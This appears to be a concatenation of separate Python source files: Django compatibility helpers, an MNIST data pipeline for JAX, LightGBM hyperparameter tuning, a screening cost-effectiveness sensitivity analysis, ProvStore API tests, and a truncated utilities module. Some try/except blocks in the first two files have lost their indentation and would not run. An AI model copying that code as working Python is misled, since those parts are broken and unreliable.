    from django.core.validators import EmailValidator as DjangoEmailValidator
    from django.core.validators import email_re
    class EmailValidator(DjangoEmailValidator):
        def __init__(self, *args, **kwargs):
            super(EmailValidator, self).__init__(email_re, *args, **kwargs)
# PATCH method is not implemented by Django
if 'patch' not in View.http_method_names:
    # mutate the class attribute once at import time so PATCH is dispatched
    View.http_method_names = View.http_method_names + ['patch']
# RequestFactory only provides `generic` from 1.5 onwards
from django.test.client import RequestFactory as DjangoRequestFactory
from django.test.client import FakePayload
try:
# In 1.5 the test client uses force_bytes
from django.utils.encoding import force_bytes as force_bytes_or_smart_bytes
except ImportError:
# In 1.4 the test client just uses smart_str
from django.utils.encoding import smart_str as force_bytes_or_smart_bytes
class RequestFactory(DjangoRequestFactory):
    # Backport: DjangoRequestFactory only gained `generic()` in Django 1.5.
    def generic(self, method, path,
            data='', content_type='application/octet-stream', **extra):
        # Build a WSGI environ for an arbitrary HTTP method, encoding `data`
        # with the project charset and only attaching a body when non-empty.
        parsed = _urlparse(path)
        data = force_bytes_or_smart_bytes(data, settings.DEFAULT_CHARSET)
        r = {
            'PATH_INFO': self._get_path(parsed),
            'QUERY_STRING': force_text(parsed[4]),
            'REQUEST_METHOD': six.text_type(method),
        }
        if data:
            r.update({
                'CONTENT_LENGTH': len(data),
                'CONTENT_TYPE': six.text_type(content_type),
                'wsgi.input': FakePayload(data),
            })
        r.update(extra)
        return self.request(**r)
# Markdown is optional
try:
    import markdown
    def apply_markdown(text):
        """
        Simple wrapper around :func:`markdown.markdown` to set the base level
        of '#' style headers to <h2>.
        """
        extensions = ['headerid(level=2)']
        safe_mode = False
        md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
        return md.convert(text)
except ImportError:
    # markdown not installed; callers must check for None before use
    apply_markdown = None
# `separators` argument to `json.dumps()` differs between 2.x and 3.x
# See: http://bugs.python.org/issue22767
if six.PY3:
    SHORT_SEPARATORS = (',', ':')
    LONG_SEPARATORS = (', ', ': ')
    INDENT_SEPARATORS = (',', ': ')
else:
    # Python 2's json module expects byte strings here
    SHORT_SEPARATORS = (b',', b':')
    LONG_SEPARATORS = (b', ', b': ')
    INDENT_SEPARATORS = (b',', b': ')
# DurationField and its helpers only exist from Django 1.8 onwards
if django.VERSION >= (1, 8):
    from django.db.models import DurationField
    from django.utils.dateparse import parse_duration
    from django.utils.duration import duration_string
else:
    DurationField = duration_string = parse_duration = None
def set_rollback():
    # Mark the current transaction for rollback in a version-appropriate way.
    if hasattr(transaction, 'set_rollback'):
        if connection.settings_dict.get('ATOMIC_REQUESTS', False):
            # If running in >=1.6 then mark a rollback as required,
            # and allow it to be handled by Django.
            transaction.set_rollback(True)
    elif transaction.is_managed():
        # Otherwise handle it explicitly if in managed mode.
        if transaction.is_dirty():
            transaction.rollback()
        transaction.leave_transaction_management()
    else:
        # transaction not managed
        pass
|
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
from sklearn.utils import shuffle
from hparams import HParams
import jax
from flax import jax_utils
try:
from ..utils.normalizer import Normalizer
from ..utils.utils import compute_latent_dimension
except (ImportError, ValueError):
from utils.normalizer import Normalizer
from utils.utils import compute_latent_dimension
hparams = HParams.get_hparams_by_name("efficient_vdvae")
def load_and_shard_tf_batch(xs, global_batch_size):
    """Reshape every array in the pytree `xs` from (global_batch_size, ...)
    to (local_devices, global_batch_size // local_devices, ...) so batches
    can be distributed across local devices (e.g. for pmap).
    """
    local_device_count = jax.local_device_count()
    def _prepare(x):
        return x.reshape((local_device_count, global_batch_size // local_device_count) + x.shape[1:])
    # FIX: jax.tree_map was deprecated and later removed from the jax
    # namespace; jax.tree_util.tree_map is the stable, identical API.
    return jax.tree_util.tree_map(_prepare, xs)
def create_synthesis_mnist_dataset():
    """Build the numpy/JAX data iterator for the configured synthesis mode.

    hparams.synthesis.synthesis_mode selects the pipeline:
      - 'reconstruction': test images paired with themselves as targets.
      - 'div_stats': random subset of the train set, inputs only.
      - 'encoding': train images paired with synthetic filenames.
    Any other mode returns None.
    """
    if hparams.synthesis.synthesis_mode == 'reconstruction':
        _, _, test_images = download_mnist_datasets()
        test_data = tf.data.Dataset.from_tensor_slices(test_images)
        # pair each (already binarized) image with itself: (input, target)
        test_data = test_data.interleave(
            lambda x: tf.data.Dataset.from_tensor_slices(tensors=(x[tf.newaxis, ...], x[tf.newaxis, ...])),
            cycle_length=tf.data.AUTOTUNE,
            num_parallel_calls=tf.data.AUTOTUNE,
            deterministic=False
        )
        test_data = test_data.batch(
            hparams.synthesis.batch_size,
            drop_remainder=True
        )
        test_data = test_data.prefetch(tf.data.AUTOTUNE)
        test_data = tfds.as_numpy(test_data)
        # shard each numpy batch across local devices
        test_data = map(lambda x: load_and_shard_tf_batch(x, hparams.synthesis.batch_size), test_data)
        test_data = jax_utils.prefetch_to_device(test_data, 10)
        return test_data
    elif hparams.synthesis.synthesis_mode == 'div_stats':
        train_data, _, _ = download_mnist_datasets()
        n_train_samples = train_data.shape[0]
        train_data = tf.data.Dataset.from_tensor_slices(train_data)
        # Take a subset of the data
        train_data = train_data.shuffle(n_train_samples)
        train_data = train_data.take(int(hparams.synthesis.div_stats_subset_ratio * n_train_samples))
        # Preprocess subset and prefect to device
        train_data = train_data.interleave(
            data_prep,
            cycle_length=tf.data.AUTOTUNE,
            num_parallel_calls=tf.data.AUTOTUNE,
            deterministic=False)
        train_data = train_data.batch(
            hparams.synthesis.batch_size,
            drop_remainder=True
        )
        train_data = train_data.prefetch(tf.data.AUTOTUNE)
        train_data = tfds.as_numpy(train_data)
        train_data = map(lambda x: load_and_shard_tf_batch(x, hparams.synthesis.batch_size), train_data)
        train_data = jax_utils.prefetch_to_device(train_data, 10)
        return train_data
    elif hparams.synthesis.synthesis_mode == 'encoding':
        train_data, _, _ = download_mnist_datasets()
        train_filenames = make_toy_filenames(train_data)
        train_data = tf.data.Dataset.from_tensor_slices((train_data, train_filenames))
        # pair each binarized image with its synthetic filename
        train_data = train_data.interleave(
            named_data_prep,
            cycle_length=tf.data.AUTOTUNE,
            num_parallel_calls=tf.data.AUTOTUNE,
            deterministic=False
        )
        train_data = train_data.batch(
            hparams.synthesis.batch_size,
            drop_remainder=True
        )
        train_data = train_data.prefetch(tf.data.AUTOTUNE)
        train_data = tfds.as_numpy(train_data)
        # only the image part is sharded; filenames pass through unchanged
        train_data = map(lambda x: (load_and_shard_tf_batch(x[0], hparams.synthesis.batch_size), x[1]), train_data)
        return train_data
    else:
        return None
def named_data_prep(img, filename):
    """Binarize one image via data_prep and pair it with its filename."""
    prepared = data_prep(img, return_targets=False)
    paired = tf.data.Dataset.from_tensor_slices(tensors=(prepared, filename[tf.newaxis]))
    return paired
def data_prep(img, use_tf=True, return_targets=True):
    """Stochastically binarize `img`: each pixel becomes 1 with probability
    equal to its grayscale intensity (random Bernoulli)."""
    # Binarize (random bernoulli)
    if use_tf:
        # Used repeatedly during training on a per-sample basis
        noise = tf.random.uniform(shape=img.shape, minval=0., maxval=1., dtype=img.dtype)
        targets = inputs = tf.cast(noise <= img, tf.float32)
        if return_targets:
            # [1, H, W, C]
            return tf.data.Dataset.from_tensor_slices(tensors=(inputs[tf.newaxis, ...], targets[tf.newaxis, ...]))
        else:
            return inputs[tf.newaxis, ...]
    else:
        # Used once for val and test data on a per-data basis
        noise = np.random.uniform(low=0., high=1., size=img.shape).astype(img.dtype)
        data = (noise <= img).astype(np.float32)
        # [n_samples, H, W, C]
        return data
def download_mnist_datasets():
    """Load MNIST, pad to 32x32, shuffle, and split test into val/test halves.

    Train images stay continuous in [0, 1] (they are re-binarized per epoch
    elsewhere); val and test are binarized once here via data_prep.
    """
    # Ignore labels
    (x_train, _), (x_test, _) = tf.keras.datasets.mnist.load_data()
    x_train = x_train[..., np.newaxis] / 255.  # (60000, 28, 28, 1)
    x_test = x_test[..., np.newaxis] / 255.  # (10000, 28, 28, 1)
    # make images of size 32x32
    x_train = np.pad(x_train, pad_width=((0, 0), (2, 2), (2, 2), (0, 0)))  # (60000, 32, 32, 1)
    x_test = np.pad(x_test, pad_width=((0, 0), (2, 2), (2, 2), (0, 0)))  # (10000, 32, 32, 1)
    x_train = shuffle(x_train)
    x_test = shuffle(x_test, random_state=101)  # Fix this seed to not overlap val and test between train and inference runs
    x_val = x_test[:len(x_test) // 2]  # 5000
    x_test = x_test[len(x_test) // 2:]  # 5000
    x_val = data_prep(x_val, use_tf=False)
    x_test = data_prep(x_test, use_tf=False)
    return x_train, x_val, x_test
def make_toy_filenames(data):
    """Synthetic per-sample filenames: 'image_0' .. 'image_{N-1}'."""
    n_samples = data.shape[0]
    return ['image_{}'.format(idx) for idx in range(n_samples)]
def create_mnist_datasets():
    """Build infinite, shuffled, device-sharded train/val iterators."""
    train_images, val_images, _ = download_mnist_datasets()
    n_train_samples = train_images.shape[0]
    n_val_samples = val_images.shape[0]
    train_data = tf.data.Dataset.from_tensor_slices(train_images).cache()
    val_data = tf.data.Dataset.from_tensor_slices(val_images).cache()
    # Repeat data across epochs
    train_data = train_data.repeat()
    val_data = val_data.repeat()
    # Shuffle samples with a buffer of the size of the dataset
    train_data = train_data.shuffle(n_train_samples)
    val_data = val_data.shuffle(n_val_samples)
    # train inputs are re-binarized stochastically on every pass
    train_data = train_data.interleave(
        data_prep,
        cycle_length=tf.data.AUTOTUNE,
        num_parallel_calls=tf.data.AUTOTUNE,
        deterministic=False
    )
    # val images were binarized once already; pair each with itself as target
    val_data = val_data.interleave(
        lambda x: tf.data.Dataset.from_tensor_slices(tensors=(x[tf.newaxis, ...], x[tf.newaxis, ...])),
        cycle_length=tf.data.AUTOTUNE,
        num_parallel_calls=tf.data.AUTOTUNE,
        deterministic=False
    )
    # cache, Batch, prefetch
    train_data = train_data.batch(
        hparams.train.batch_size,
        drop_remainder=True
    )
    train_data = train_data.prefetch(tf.data.AUTOTUNE)
    val_data = val_data.batch(
        hparams.val.batch_size,
        drop_remainder=True
    )
    val_data = val_data.prefetch(tf.data.AUTOTUNE)
    train_data = tfds.as_numpy(train_data)
    val_data = tfds.as_numpy(val_data)
    # shard each numpy batch across local devices and pipeline to device
    train_data = map(lambda x: load_and_shard_tf_batch(x, hparams.train.batch_size), train_data)
    train_data = jax_utils.prefetch_to_device(train_data, 5)
    val_data = map(lambda x: load_and_shard_tf_batch(x, hparams.val.batch_size), val_data)
    val_data = jax_utils.prefetch_to_device(val_data, 1)
    return train_data, val_data
|
<filename>oaprogression/training/lgbm_tools.py
import warnings
from functools import partial
import lightgbm as lgb
import numpy as np
import pandas as pd
from hyperopt import hp, fmin, tpe, STATUS_OK, Trials, space_eval
from tqdm import tqdm
def fit_lgb(params, train_folds, feature_set, metric, return_oof_res=False, return_models=False):
    """Cross-validated LightGBM training for progression prediction.

    Trains one booster per (train, val) fold, pools the out-of-fold
    predictions and scores them with `metric`.

    Parameters
    ----------
    params : dict of LightGBM parameters
    train_folds : iterable of (train_split, val_split) DataFrames with
        Progressor / ID / Side columns plus the features
    feature_set : list of feature column names
    metric : callable(y_true, y_score) -> float

    Returns
    -------
    The metric value alone, or a list [metric_value, clfs?, oof_results?]
    (in that order) when return_models / return_oof_res are set.
    """
    oof_results = []
    clfs = []
    for fold_id, (train_split, val_split) in enumerate(train_folds): # Going through the prepared fold splits
        # binary target: Progressor > 0
        d_train_prog = lgb.Dataset(train_split[feature_set], label=train_split.Progressor.values > 0)
        d_val_prog = lgb.Dataset(val_split[feature_set], label=val_split.Progressor.values > 0)
        with warnings.catch_warnings():
            # LGBM throws annoying messages, because we do not set the number
            # of iterations as a parameter
            warnings.simplefilter("ignore")
            clf_prog = lgb.train(params, d_train_prog, valid_sets=(d_train_prog, d_val_prog), verbose_eval=False)
        preds_prog = clf_prog.predict(val_split[feature_set], num_iteration=clf_prog.best_iteration)
        res = pd.DataFrame(data={'ID': val_split.ID.values, 'Side': val_split.Side.values, 'prog_pred': preds_prog,
                                 'Progressor': val_split.Progressor.values > 0})
        oof_results.append(res)
        clfs.append(clf_prog)
    oof_results = pd.concat(oof_results)
    res = list()
    res.append(metric(oof_results.Progressor.values.astype(int),
                      oof_results.prog_pred.values.astype(float)))
    if return_models:
        res.append(clfs)
    if return_oof_res:
        res.append(oof_results)
    if len(res) == 1:
        return res[0]
    else:
        return res
def init_lgbm_param_grid(seed):
    """Build the hyperopt search space for the LightGBM model.

    Parameters
    ----------
    seed : int
        Seed stored in the space for LightGBM's own RNGs.

    Returns
    -------
    dict mapping LightGBM parameter names to hyperopt expressions or
    constants, suitable for `fmin(space=...)` / `space_eval`.
    """
    params = dict()
    params['num_iterations'] = hp.choice('num_iterations', [10, 100, 1000, 2000, 3000])
    params['early_stopping_round'] = hp.choice('early_stopping_round', [50, 100])
    params['learning_rate'] = hp.loguniform('learning_rate', -5, -3)
    params['boosting_type'] = hp.choice('boosting_type', ['gbdt', 'dart'])
    params['objective'] = 'binary'
    params['metric'] = 'binary_logloss'
    # FIX: the three lines below previously ended with stray trailing commas,
    # which wrapped the values in 1-element tuples instead of hyperopt
    # expressions, producing invalid LightGBM parameters.
    params['num_leaves'] = 2 + hp.randint('num_leaves', 21)
    params['max_depth'] = 3 + hp.randint('max_depth', 11)
    params['num_threads'] = 8
    params['feature_fraction'] = hp.uniform('feature_fraction', 0.6, 0.95)
    params['bagging_fraction'] = hp.uniform('bagging_fraction', 0.4, 0.95)
    params['bagging_freq'] = 1 + hp.randint('bagging_freq', 9)
    params['seed'] = seed
    params['bagging_seed'] = seed
    params['verbose'] = -1
    return params
def eval_lgb_objective(space, train_folds, feature_set, metric, callback=None):
    """Hyperopt objective: cross-validated score of one LightGBM config.

    Hyperopt minimizes, so the (higher-is-better) metric is reported as
    ``1 - score``. `callback`, when given, is invoked once per evaluation
    (e.g. to advance a progress bar).
    """
    score = fit_lgb(space, train_folds, feature_set, metric, False, False)
    if callback is not None:
        callback()
    return {'status': STATUS_OK, 'loss': 1 - score}
def optimize_lgbm_hyperopt(train_folds, feature_set, metric, seed, hyperopt_trials=100):
    """Tune LightGBM hyper-parameters with hyperopt's TPE search.

    :param train_folds: cross-validation folds passed through to fit_lgb.
    :param feature_set: feature columns used for training.
    :param metric: scoring function (higher is better; the objective
        minimizes 1 - metric).
    :param seed: seed used for both the parameter grid and hyperopt's RNG.
    :param hyperopt_trials: number of TPE evaluations to run.
    :return: tuple of (best parameter dict, hyperopt Trials object).
    """
    trials = Trials()
    # Progress bar is advanced through the objective's callback hook.
    pbar = tqdm(total=hyperopt_trials, desc="Hyperopt:")
    param_space = init_lgbm_param_grid(seed)
    best = fmin(fn=partial(eval_lgb_objective, train_folds=train_folds,
                           feature_set=feature_set, metric=metric, callback=lambda: pbar.update()),
                space=param_space,
                algo=tpe.suggest,
                max_evals=hyperopt_trials,
                trials=trials,
                verbose=0,
                rstate=np.random.RandomState(seed))
    pbar.close()
    # space_eval maps hyperopt's index-encoded result back to actual values.
    return space_eval(param_space, best), trials
|
<filename>code/main_sensitivity_analyses.py
import pandas as pd
from utils.functions import psa_function, lognormal
from utils.parameters import Params
from models.no_screening import NoScreening
from models.no_screening_noMRI import NoScreeningNoMRI
from models.age_screening import AgeScreening
from models.age_screening_noMRI import AgeScreeningNoMRI
from models.prs_screening import PrsScreening
from models.prs_screening_noMRI import PrsScreeningNoMRI
# Number of probabilistic sensitivity-analysis simulations per scenario.
sims = 10000
# Root of the project data tree; '...' is a placeholder that must be set
# before running this script.
PATH = '...'
# Baseline parameter set; each scenario below builds its own Params object,
# so this instance appears unused by the analyses that follow.
params = Params(PATH=PATH, sims=sims)
params.gen_params()
# Reference absolute-risk thresholds to sweep: '2.0', '2.5', ..., '10.0'
# in steps of 0.5 (formatted to one decimal place, matching the input
# file naming scheme).
reference_absolute_risk = [f"{x / 2:.1f}" for x in range(4, 21)]
def run_analyses(params, sensitivity_analysis, od_by_risk: bool = False):
    """Run all six screening models for every reference absolute-risk level.

    :param params: Params object holding the (possibly modified) model inputs.
    :param sensitivity_analysis: subdirectory name for this scenario's outputs.
    :param od_by_risk: forwarded to the PRS models (overdiagnosis varying
        with polygenic risk).
    """
    # Models that take only the parameter set ...
    plain_models = [
        (NoScreening, 'no_screening'),
        (NoScreeningNoMRI, 'no_screening_noMRI'),
        (AgeScreening, 'age_screening'),
        (AgeScreeningNoMRI, 'age_screening_noMRI'),
    ]
    # ... and models that additionally need the absolute-risk table.
    prs_models = [
        (PrsScreening, 'prs_screening'),
        (PrsScreeningNoMRI, 'prs_screening_noMRI'),
    ]
    for reference_value in reference_absolute_risk:
        out_dir = f'{PATH}data/model_outputs/sensitivity_analyses/{sensitivity_analysis}{reference_value}/'
        a_risk = pd.read_csv(f'{PATH}data/processed/a_risk/a_risk_{reference_value}.csv').set_index('age')
        for model_cls, name in plain_models:
            model_cls(params).write_to_file(PATH=out_dir, name=name,
                                            reference_value=reference_value)
        for model_cls, name in prs_models:
            model_cls(params, a_risk, od_by_risk).write_to_file(PATH=out_dir, name=name,
                                                                reference_value=reference_value)
# ---------------------------------------------------------------------------
# Sensitivity scenarios: each block builds (or reuses) a Params object,
# overrides one input, and re-runs all screening models via run_analyses.
# ---------------------------------------------------------------------------

# PRS cost
# £50 per PRS
prs = Params(PATH=PATH, sims=sims)
prs.gen_params()
prs.cost_prs = psa_function(50, sims)
run_analyses(prs, 'prs_cost/50/')
# £100 per PRS (reuses the same Params object, only the cost changes)
prs.cost_prs = psa_function(100, sims)
run_analyses(prs, 'prs_cost/100/')

# MRI cost
# £100 per MRI
mri = Params(PATH=PATH, sims=sims)
mri.gen_params()
mri.cost_mri = psa_function(100, sims)
run_analyses(mri, 'mri_cost/100/')
# £200 per MRI
mri.cost_mri = psa_function(200, sims)
run_analyses(mri, 'mri_cost/200/')

# Using assumptions from the PRECISION study regarding impact of MRI prior
# to biopsy on clinically significant & insignificant cancers detected.
# NOTE(review): here the overrides are set BEFORE gen_params(), unlike the
# cost scenarios above — confirm Params applies them in both orders.
precision = Params(PATH=PATH, sims=sims)
precision.cs_mri = lognormal(0.1133, 0.0373, sims)
# Floor the clinically-significant multiplier at 1 (MRI assumed not to
# reduce significant-cancer detection).
precision.cs_mri[precision.cs_mri < 1] = 1
precision.cis_mri = lognormal(-0.1393, 0.03596, sims)
precision.gen_params()
run_analyses(precision, 'PRECISION/')

# Overdiagnosis varying with polygenic risk
od = Params(PATH=PATH, sims=sims)
od.gen_params()
run_analyses(od, 'overdiagnosis/', od_by_risk=True)

# Varying uptake with screening (75% uptake of the PRS / PSA test)
uptake_prs = Params(PATH=PATH, sims=sims)
uptake_prs.uptake_prs = 0.75
uptake_prs.gen_params()
run_analyses(uptake_prs, 'uptake_prs/')
uptake_psa = Params(PATH=PATH, sims=sims)
uptake_psa.uptake_psa = 0.75
uptake_psa.gen_params()
run_analyses(uptake_psa, 'uptake_psa/')
|
<gh_stars>0
"""Test class for ProvStore service.
"""
# Copyright (c) 2015 University of Southampton
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import requests
import unittest
from nose.tools import istest
from nose_parameterized import parameterized
from prov_service_tests import http
from prov_service_tests import standards
from prov_service_tests.test_service import ServiceTestCase
@istest
class ProvStoreTestCase(ServiceTestCase):
    """Test class for ProvStore service. These tests check that
    ProvStore is available and responds to requests directed against the
    `ProvStore REST API <https://provenance.ecs.soton.ac.uk/store/help/api/>`_.

    The class expects two environment variables to be set:

    - ``PROVSTORE_URL`` - ProvStore base URL e.g.
      ``https://provenance.ecs.soton.ac.uk/store/api/v0/documents/``
    - ``PROVSTORE_API_KEY`` - ProvStore user name and API key e.g.
      ``user:12345qwert``
    """

    URL_ENV = "PROVSTORE_URL"
    """str or unicode: name of environment variable holding ProvStore
    URL
    """

    API_KEY_ENV = "PROVSTORE_API_KEY"
    """str or unicode: name of environment variable holding ProvStore API key
    """

    CONTENT_TYPES = {
        standards.PROVN: "text/provenance-notation",
        standards.TTL: "text/turtle",
        standards.TRIG: "application/trig",
        standards.PROVX: "application/xml",
        standards.JSON: "application/json"
    }
    """dict: mapping from :mod:`prov_service_tests.standards` formats to
    content types understood by ProvStore
    """

    EXTENSIONS = {
        standards.PROVX: "xml"
    }
    """dict: mapping from :mod:`prov_service_tests.standards` formats to
    file extensions understood by ProvStore
    """

    def setUp(self):
        """Read the service URL and API key from the environment and
        reset the cached per-test document URL."""
        super(ProvStoreTestCase, self).setUp()
        self.url = os.environ[ProvStoreTestCase.URL_ENV]
        self.authorization = "ApiKey " + \
            os.environ[ProvStoreTestCase.API_KEY_ENV]
        # URL of any document stored by the running test; tearDown uses it
        # to clean up.
        self.document_url = None

    def tearDown(self):
        """Delete the document stored by the test, if any, printing a
        warning when deletion does not return 204 NO CONTENT."""
        super(ProvStoreTestCase, self).tearDown()
        if self.document_url is not None:
            response = requests.delete( \
                self.document_url,
                headers={http.AUTHORIZATION: self.authorization})
            if response.status_code != requests.codes.no_content:
                print("Warning: " + self.document_url +
                      " may not have been deleted")

    def post(self, document, format=standards.JSON):
        """Submit authorized POST /store/api/v0/documents/.

        The document URL is cached by the class. A test is done to check
        that the response code is 201 CREATED.

        :param document: document in given format
        :type document: str or unicode
        :param format: a :mod:`prov_service_tests.standards` format
        :type format: str or unicode
        :return: URL of stored document
        :rtype: str or unicode
        """
        headers = {http.CONTENT_TYPE: ProvStoreTestCase.CONTENT_TYPES[format],
                   http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.JSON],
                   http.AUTHORIZATION: self.authorization}
        # rec_id embeds the process id so concurrent test runs use
        # distinct document names.
        request = {"content": document,
                   "public": True,
                   "rec_id": self.__class__.__name__ + str(os.getpid())}
        response = requests.post(self.url,
                                 headers=headers,
                                 data=json.dumps(request))
        self.assertEqual(requests.codes.created, response.status_code)
        response_json = json.loads(response.text)
        return self.url + str(response_json["id"])

    def test_get_documents(self):
        """Test GET /store/api/v0/documents/.
        """
        response = requests.get(self.url)
        self.assertEqual(requests.codes.ok, response.status_code)

    @parameterized.expand(standards.FORMATS)
    def test_post_document(self, format):
        """Test POST /store/api/v0/documents/.
        """
        self.document_url = self.post(self.get_primer(format), format)
        self.assertNotEqual(None, self.document_url)

    def test_delete_document(self):
        """Test DELETE /store/api/v0/documents/:id/.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        headers = {http.AUTHORIZATION: self.authorization}
        response = requests.delete(self.document_url, headers=headers)
        self.assertEqual(requests.codes.no_content, response.status_code)
        # Deletion succeeded, so tearDown has nothing left to clean up.
        self.document_url = None

    def test_get_document(self):
        """Test GET /store/api/v0/documents/:id/.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        response = requests.get(self.document_url)
        self.assertEqual(requests.codes.ok, response.status_code)

    @parameterized.expand(standards.FORMATS)
    def test_get_document_format(self, format):
        """Test GET /store/api/v0/documents/:id.:format.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        # Map format to extension supported by ProvStore
        if format in ProvStoreTestCase.EXTENSIONS:
            format = ProvStoreTestCase.EXTENSIONS[format]
        response = requests.get(self.document_url + "." + format)
        self.assertEqual(requests.codes.ok, response.status_code)

    def test_get_document_flattened(self):
        """Test GET /store/api/v0/documents/:id/flattened/.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        headers = {http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.PROVN]}
        response = requests.get(self.document_url + "/flattened",
                                headers=headers)
        self.assertEqual(requests.codes.ok, response.status_code)

    def test_get_document_flattened_views_data(self):
        """Test GET /store/api/v0/documents/:id/flattened/views/data.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        headers = {http.ACCEPT: ProvStoreTestCase.CONTENT_TYPES[standards.PROVN]}
        response = requests.get(self.document_url + "/flattened/views/data",
                                headers=headers)
        self.assertEqual(requests.codes.ok, response.status_code)

    def test_get_document_bundles(self):
        """Test GET /store/api/v0/documents/:id/bundles.
        """
        self.document_url = self.post(self.get_primer(standards.JSON))
        response = requests.get(self.document_url + "/bundles")
        self.assertEqual(requests.codes.ok, response.status_code)

    def post_bundle(self, document):
        """Submit GET /store/api/v0/documents/:doc_id/bundles/:bundle_id.

        - Submit authorized POST /store/api/v0/documents/ with a document
          that contains bundles.
        - Extract the document URL from HTTP response.
        - Cache the document URL in the class.
        - Submit GET /store/api/v0/documents/:doc_id/bundles/ request.
        - Get the URL of the first bundle.
        - Submit GET /store/api/v0/documents/:doc_id/bundles/:bundle_id
          request.
        - Return bundle URL.

        Tests are done to check response codes and that at least one
        bundle is available.

        :param document: document in JSON format
        :type document: str or unicode
        :return: URL of bundle
        :rtype: str or unicode
        """
        self.document_url = self.post(document)
        response = requests.get(self.document_url + "/bundles")
        self.assertEqual(requests.codes.ok, response.status_code)
        response_json = json.loads(response.text)
        objects = response_json["objects"]
        self.assertTrue(len(objects) > 0, msg="Expected at least one bundle")
        bundle_url = self.document_url + "/bundles/" + str(objects[0]["id"])
        response = requests.get(bundle_url)
        self.assertEqual(requests.codes.ok, response.status_code)
        return bundle_url

    def test_get_document_bundles_bundle(self):
        """Test GET /store/api/v0/documents/:doc_id/bundles/:bundle_id.
        """
        self.post_bundle(self.get_document("bundle.json"))

    @parameterized.expand(standards.FORMATS)
    def test_get_document_bundles_bundle_format(self, format):
        """Test GET /store/api/v0/documents/:doc_id/bundles/:bundle_id(.:format).
        """
        bundle_url = self.post_bundle(self.get_document("bundle.json"))
        # Map format to extension supported by ProvStore
        if format in ProvStoreTestCase.EXTENSIONS:
            format = ProvStoreTestCase.EXTENSIONS[format]
        response = requests.get(bundle_url + "." + format)
        self.assertEqual(requests.codes.ok, response.status_code)
|
<filename>brav0/utils.py
import glob
import pickle
import warnings
from datetime import datetime
from pathlib import Path
from typing import Optional, Union
import numpy as np
import pandas as pd
import yaml
from astropy.table import Table
from box import Box
from pandas.core.frame import DataFrame
from pandas.core.series import Series
from tqdm import tqdm
from xarray.core.dataset import Dataset
from brav0.model import ZeroPointModel
def pathglob(pattern: Union[str, Path]) -> list[str]:
    """
    Thin wrapper around :func:`glob.glob` that also accepts pathlib paths.

    :param pattern: Path or string representing a glob pattern
    :type pattern: Union[str, Path]
    :return: List of individual matching paths
    :rtype: list[str]
    """
    matches = glob.glob(str(pattern))
    return matches
def generate_flist(pattern: Union[str, Path], ext: str = ".rdb") -> list[str]:
    """
    Build the list of input files matching *pattern*.

    A directory is expanded to all ``*ext`` files directly inside it;
    any other pattern is globbed as-is.

    :param pattern: directory path or glob pattern
    :param ext: file extension used when *pattern* is a directory
    :return: list of matching file paths
    """
    pattern = Path(pattern)
    target = pattern / f"*{ext}" if pattern.is_dir() else pattern
    return glob.glob(str(target))
def append_to_dirpath(path: Path, extra: str) -> Path:
    """
    Add a string to a path object (usually useful for directories).

    :param path: Initial path
    :type path: Path
    :param extra: Appended string
    :type extra: str
    :return: Path with the string appended to its basename
    :rtype: Path
    """
    suffixed_name = path.name + extra
    return path.parent / suffixed_name
def get_wmean(data: DataFrame, col_pairs: dict[str, str]) -> Series:
    """
    Get the weighted mean and error of a dataframe using column pairs.

    Each (value, error) column pair is combined with an inverse-variance
    weighted mean; the paired error column receives the standard error of
    that weighted mean. Pairs whose error column is entirely NaN yield NaN
    for both columns.

    :param data: Input dataframe
    :type data: DataFrame
    :param col_pairs: Column pairs (value -> error mapping)
    :type col_pairs: Dict
    :return: Series with the weighted mean and the error for each binned value
    :rtype: Series
    """
    val_cols = pd.Index(list(col_pairs.keys()))
    err_cols = pd.Index(list(col_pairs.values()))
    vals = data[val_cols].astype(float)
    errs2 = data[err_cols].astype(float) ** 2
    output = pd.Series(index=data.columns, dtype=float)
    # Pairs whose error column is all-NaN cannot be weighted: flag both the
    # value and error columns as NaN in the output.
    # (The original code assigned output[nan_cols] = np.nan twice in a row;
    # the duplicate statement has been removed.)
    nan_col_mask = errs2.isna().all().values
    nan_cols = val_cols[nan_col_mask].union(err_cols[nan_col_mask])
    output[nan_cols] = np.nan
    good_cols = data.columns[~data.columns.isin(nan_cols)]
    val_cols_good = val_cols[val_cols.isin(good_cols)]
    err_cols_good = err_cols[err_cols.isin(good_cols)]
    good_vals = vals[val_cols_good].values
    good_errs2 = errs2[err_cols_good].values
    # Inverse-variance weighted mean and its standard error.
    output[val_cols_good] = np.nansum(
        good_vals / good_errs2, axis=0
    ) / np.nansum(1 / good_errs2, axis=0)
    output[err_cols_good] = np.sqrt(1 / np.nansum(1 / good_errs2, axis=0))
    return output
def get_binned_data(
    data: DataFrame, wmean_pairs: Optional[dict[str, str]] = None
) -> DataFrame:
    """
    Bin dataframe with three possible operations:

    - Weighted mean: for wmean_pairs columns, takes both a value and its error
    - Regular mean: take mean of values
    - First: keep first value

    The dataframe is grouped by file and date, then binned.

    :param data: DataFrame with OBJECT and DATE-OBS info, plus other quantities
    :type data: DataFrame
